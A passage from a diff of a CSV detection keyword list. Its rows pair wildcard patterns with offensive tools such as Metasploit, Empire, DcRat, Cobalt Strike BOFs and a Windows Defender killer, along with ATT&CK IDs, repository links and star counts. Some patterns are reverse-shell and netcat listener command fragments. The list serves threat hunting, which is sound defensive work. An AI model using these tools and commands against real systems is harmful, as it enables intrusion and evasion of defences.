and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reverse_win_http.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*reverseDisableWinDef.cpp*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" -"*ReverseProxy.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*ReverseProxy.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*ReverseShell.ps1*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" -"*ReverseShell_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense 
Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","983","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*ReverseShell_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*ReverseSocksProxyHandler.*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*ReverseSocksProxyHandler.py*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" -"*ReversingID/Shellcode-Loader*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","139","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" -"*RevertToSelf was successful*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Revoke-Obfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. used for de obfuscating powershell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","7","667","121","2020-02-11T19:40:37Z","2017-07-11T01:20:48Z" +"*ReversingID/Shellcode-Loader*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" +"*RevertToSelf was successful*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Revoke-Obfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. 
used for de obfuscating powershell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","7","668","121","2020-02-11T19:40:37Z","2017-07-11T01:20:48Z" "*RevWinDefKiller.exe*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*RhinoSecurityLabs*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*RhinoSecurityLabs/pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*-Rhost * -Port * -Cmd *cmd /c*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-Jenkins.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*rhosts_walker_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*RhinoSecurityLabs/pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*-Rhost * -Port * -Cmd *cmd /c*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-Jenkins.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*rhosts_walker_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*RiccardoAncarani/BOFs*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*RiccardoAncarani/LiquidSnake*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*RiccardoAncarani/TaskShell*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","1","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*rid_hijack.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"*ridbrute_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ridbrute_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*ridrelay*","offensive_tool_keyword","ridrelay","Quick and easy way to get domain usernames while on an internal network.","T1175 - T1553.002 - T1553.003","TA0003 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/skorov/ridrelay","1","0","N/A","N/A","4","375","62","2020-05-20T03:35:32Z","2018-04-14T22:10:01Z" -"*Ripemd-160.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password 
cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Ripemd-160.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*rkervella/CarbonMonoxide*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*rlwrap -cAr nc -lvnp *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral 
Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*rlwrap nc -lvnp *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*rm -f *.o dump_vdso test_payload*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" -"*rmg bind * jmxrmi --bind-objid *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg bind *127.0.0.1:*--localhost-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg call * --plugin GenericPrint.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities 
on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg call * --signature * --bound-name plain-server*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg codebase *http* --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg codebase *java.util.HashMap *--bound-name legacy-service*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg enum *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - 
TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg guess * *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg listen * CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg listen 0.0.0.0 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg objid *[*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg roguejmx *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg scan *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg scan * --ports *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg serial * AnTrinh * --component 
*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg serial *CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg-*-jar-with-dependencies.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - 